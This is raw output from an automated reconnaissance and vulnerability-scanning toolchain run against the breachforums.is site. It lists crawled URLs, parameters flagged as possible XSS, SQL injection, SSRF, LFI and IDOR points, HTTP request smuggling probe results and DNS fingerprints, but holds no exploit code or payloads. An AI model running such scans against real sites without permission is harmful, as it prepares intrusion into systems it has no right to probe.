https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa904103bd42544/ab0187e3dcc84c4
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa90878392515b8/3aecc7a3df9470a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1531514825:1692897840:eUWNf7fW6XVuLlT9aRZxr6hlr_dTUY9_6aMLApSZW-g/7fbd86712ff2ce34/8f76b9491e06dfb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1541117182:1692490032:jFRh8PwYCQSTcTOIJF-peT2KDWzvkdqo9QyJqfHdsXE/7f9698d22c0af99f/5e3d6d40359ae29
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1562382505:1693020149:4vicr8OXfVtDL_3HO_nr0TIH-XaFaYHK1JlHDJvfk_8/7fc90d0a7b7fcea4/5d1ebb5cd9e3147
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1576630504:1692897737:tIJaC-JPYvQPoxLSGCoZlzpuwGz8sS7_cVygvlrdqKE/7fbd875b6ee9d011/65ca74a6c41291a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1601942260:1692612458:FiEUxzGNzcWt3ZvzRh36SJ5OxEIXbFZNxFrmU7QhxDI/7fa2475afaef9694/7c73cc4ef09980b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1602533527:1692684561:6ZGT2Z0d6ntDmcsGVhuEs52xc_wba9iThHxLNEqiw6U/7fa904250cb4981c/d522a2299341470
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1626874891:1692684687:nYafBjKOMejBU54OxB_UjHp7lxqAPv4heouo7t-cUlw/7fa92493abeef963/129d2c5b85a234a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/164799325:1693023784:ebVlS7KP8HrnuFbBfhsvFCKSC9z9jwO5yXaGULeqv5c/7fc960bffc579806/b6155b4c1b3d8ef
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/167203070:1692662852:HzlaDP41FGGlZ7RJVp2b9x8b-CGez-EQ3UJsC4f6Ruc/7fa719903d5ece94/c1f43952a367dd8
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1678784099:1692245188:0EQS2B9lFfJ552XVScpUqYgEaWR22y4j2dctAJdEOuI/7f7f362d4bd9fb38/3b3d62201010dde
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1694940522:1692681000:vVaMB_VszblU28nIf5K-7rD-vNnThqaP2x0LYvDBRTY/7fa905018ef3fa62/a01f3e618a3f757
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1717955863:1692680854:e09BvJ5CXFjSAnAI1CNquNqo3NUGqiY6vmT2INcsFDc/7fa9047eff3a967f/14b424da9fea5cc
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1719771961:1690326617:U-j22M-Xwz2ELqY6Z-DJBX9RSANARcUK66mqQs_MyD4/7ec844a8c8309644/2b5c076af236a2f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1727667165:1692241681:IAr7jRpXQ5z8BQhhgr9BrK3ZyA7p5FsS6jDMRUHGdP8/7f7f1c1a2ca0234f/3a6efd516165acf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1735053775:1692680919:CQh5UAClTnXy4Qss_MocgJLmWRE1p8XdPjkw6H866UQ/7fa908872ef91736/715e7a1eedf46d1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1740977491:1692684726:DH7n3f_88iJB2W9OHY8S11OHpgSmJX4e9ivsJpTfQp4/7fa91c6e0906fade/7f612461b707de9
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1742204268:1694795223:mK6esQDe3D6tH-hFQH4Bqyzv010jpOyAdBu_uLge0rU/80729e559d252519/b64e195e0c46ea1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1764495139:1692684740:FfwInAxWGRVHi7SS4tKHgrExwP1AcR5Cvxkz5Fzbcxc/7fa91d450838cf19/2f0990aec959137
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1783285080:1692367750:fTaMQE-B-0UQxp65tSIF8vCra31ANUbw5QrRcPG_aEA/7f8af9f0b906270c/41717ca87dc406f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1804297456:1694795261:srtvcjZ_ncGyLg_BqjxRgJt8tqELhsFziRziTo-j8_Q/8072900dad2b15fb/600d9fe572a03cf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa921269b63d01d/e66320eb3328fdb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa924a04bc4cfc0/4bc7ef6783acaaf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa9282b0b9422a2/23fffa04ec5eb68
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa91e7ec9ba1754/674e35269ca4382
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa9248bbac8ce6c/1ed38ee27e820c5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa92651a81a24c9/f7c6a58eb0c2347
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/184247199:1692284760:zifxnZfDkoUWbL-aFW-cimxBBVAavpKJAEWL2oIifQY/7f82fb8b28672714/c4533394b3d80d0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1870685351:1692489925:zaO7WWgzVHJz1mSBlF_qAMefeJn8ymVZz_JhxpT10KM/7f9698b9b9e6251c/c911f8d45914fdd
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1873172762:1690326715:MJb8YBzN0Z_KAqQIOBcQFqPo-fRnfJGScN5yO26kXHw/7ec844645c1b17ec/287163d9452a349
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1881875246:1692489950:8wox0di1wm-ey66PtcF91fO9LCwCm9J2h0ztfZdTAX8/7f9698f4be022700/dfe4e08d504326e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1925288593:1692245304:MagemM1DCfAKgoViu_BXdDWvb6dIAjXe1v9taCrAgP0/7f7f36f9da139645/7202422cc9a4b05
====================================================================================•x[2023-09-17](20:32)x•
 FETCHING HACKERTARGET URLS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 FETCHING GUA URLS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN 
====================================================================================•x[2023-09-17](20:32)x•

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 


==================================================================================================
http://breachforums.is:8080
==================================================================================================                  
__________________________________________________________________________________________________

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 

[+] URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-urls-sorted.txt                                     
__________________________________________________________________________________________________

[+] Dynamic URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-dynamic-sorted.txt                                  
__________________________________________________________________________________________________

[+] Form URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-forms-sorted.txt                                    
__________________________________________________________________________________________________

[+] Unique Dynamic Parameters Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-dynamic-unique.txt                                  
__________________________________________________________________________________________________

[+] Sub-domains Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-subdomains-sorted.txt                               
__________________________________________________________________________________________________

[+] Emails Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-emails-sorted.txt                                   
__________________________________________________________________________________________________

[+] Phones Discovered: 
/usr/share/blackwidow/breachforums.is_8080/breachforums.is_8080-phones-sorted.txt                                   
__________________________________________________________________________________________________

[+] Loot Saved To: 
/usr/share/blackwidow/breachforums.is_8080/                                                                         
__________________________________________________________________________________________________

====================================================================================•x[2023-09-17](20:32)x•
 RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/ads.txt
https://breachforums.is/app-ads.txt
https://breachforums.is/canary.txt
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING INTERESTING PARAMETERS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING XSS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING SSRF STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING REDIRECT STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING RCE STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING IDOR STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING SQL STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING LFI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING SSTI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING DEBUG STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:32)x•
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:32)x•
 DOWNLOADING ALL JAVASCRIPT FILES 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 DISPLAYING ALL JAVASCRIPT COMMENTS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 DISPLAYING ALL JAVASCRIPT LINKS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING LINKFINDER 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 DISPLAYING PATH RELATIVE LINKS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 DISPLAYING JAVASCRIPT URLS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 DISPLAYING JAVASCRIPT DOMAINS 
====================================================================================•x[2023-09-17](20:32)x•
====================================================================================•x[2023-09-17](20:32)x•
 RUNNING COMMON FILE/DIRECTORY BRUTE FORCE 
====================================================================================•x[2023-09-17](20:32)x•

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: htm, html, asp, aspx, php, jsp, js | HTTP method: GET | Threads: 100 | Wordlist size: 9696

Output File: /usr/share/sniper/loot/workspace/https:--breachforums.is/web/dirsearch-breachforums.is.txt

Error Log: /usr/share/sniper/plugins/dirsearch/logs/errors-23-09-17_20-32-49.log

Target: http://breachforums.is:8080/

[20:32:50] Starting: 
                                                                            
Task Completed                                                                                                      
====================================================================================•x[2023-09-17](20:36)x•
 RUNNING HTTP REQUEST SMUGGLING DETECTION 
====================================================================================•x[2023-09-17](20:36)x•

  ______                         _              
 / _____)                       | |             
( (____  ____  _   _  ____  ____| | _____  ____ 
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |    
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|    
                    (_____(_____|               

     @defparam                         v1.1

[+] URL        : http://breachforums.is:8080
[+] Method     : POST
[+] Endpoint   : 
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 0 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[tabprefix1]   : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[tabprefix2]   : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[space1]       : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-01]  : OK (TECL: 0.09 - 400) (CLTE: 0.14 - 400)                                           
[postspace-01] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-01]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-01]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-01] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-01] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-01]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-01]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-01]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-01]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-04]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[postspace-04] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[prespace-04]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspace-04]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-04] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-04] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-04]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-04]: OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[endspacerx-04]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-04]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-08]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[postspace-08] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-08]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-08]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-08] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-08] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-08]: OK (TECL: 0.09 - 400) (CLTE: 0.14 - 400)                                           
[xnprespace-08]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-08]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-08]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-09]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[postspace-09] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[prespace-09]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-09]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-09] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-09] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-09]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-09]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-09]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-09]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-0a]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[postspace-0a] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0a]  : OK (TECL: 0.15 - 400) (CLTE: 0.15 - 400)                                           
[endspace-0a]  : OK (TECL: 0.13 - 400) (CLTE: 0.13 - 400)                                           
[xprespace-0a] : OK (TECL: 0.14 - 400) (CLTE: 0.12 - 400)                                           
[endspacex-0a] : OK (TECL: 0.14 - 400) (CLTE: 0.11 - 400)                                           
[rxprespace-0a]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0a]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-0a]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-0a]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-0b]  : OK (TECL: 0.10 - 400) (CLTE: 0.14 - 400)                                           
[postspace-0b] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0b]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-0b]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-0b] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-0b] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-0b]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0b]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-0b]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-0b]: OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[midspace-0c]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-0c] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0c]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspace-0c]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-0c] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-0c] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[rxprespace-0c]: OK (TECL: 0.10 - 400) (CLTE: 0.12 - 400)                                           
[xnprespace-0c]: OK (TECL: 0.23 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-0c]: OK (TECL: 0.12 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-0c]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-0d]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-0d] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-0d]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-0d]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-0d] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-0d] : OK (TECL: 0.10 - 400) (CLTE: 0.12 - 400)                                           
[rxprespace-0d]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-0d]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-0d]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-0d]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[midspace-1f]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-1f] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-1f]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-1f]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-1f] : OK (TECL: 0.11 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-1f] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-1f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-20]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[postspace-20] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[prespace-20]  : OK (TECL: 0.15 - 400) (CLTE: 0.13 - 400)                                           
[endspace-20]  : OK (TECL: 0.13 - 400) (CLTE: 0.12 - 400)                                           
[xprespace-20] : OK (TECL: 0.13 - 400) (CLTE: 0.14 - 400)                                           
[endspacex-20] : OK (TECL: 0.13 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-20]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-20]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-20]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-20]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[midspace-7f]  : OK (TECL: 0.09 - 400) (CLTE: 0.16 - 400)                                           
[postspace-7f] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-7f]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-7f]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-7f] : OK (TECL: 0.11 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-7f] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-7f]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-7f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-7f]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-7f]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[midspace-a0]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[postspace-a0] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-a0]  : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[endspace-a0]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-a0] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-a0] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[rxprespace-a0]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-a0]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-a0]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-a0]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[postspace-ff] : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[prespace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-ff]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-ff] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-ff] : OK (TECL: 0.09 - 400) (CLTE: 0.15 - 400)                                           
[rxprespace-ff]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-ff]: OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[endspacerx-ff]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-ff]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
====================================================================================•x[2023-09-17](20:36)x•
 RUNNING NUCLEI SCAN 
====================================================================================•x[2023-09-17](20:36)x•
[mx-fingerprint] [dns] [info] breachforums.is [10 mail.breachforums.is.]
[dmarc-detect] [dns] [info] _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]
[dns-saas-service-detection:cloudflare-cdn] [dns] [info] breachforums.is
[nameserver-fingerprint] [dns] [info] breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]
[txt-fingerprint] [dns] [info] breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                                                                         
[dns-waf-detect:cloudflare] [dns] [info] breachforums.is
[tech-detect:cloudflare] [http] [info] http://breachforums.is:8080
====================================================================================•x[2023-09-17](20:45)x•
 RUNNING SC0PE WEB VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](20:45)x•
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:8080//, Server: cloudflare
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
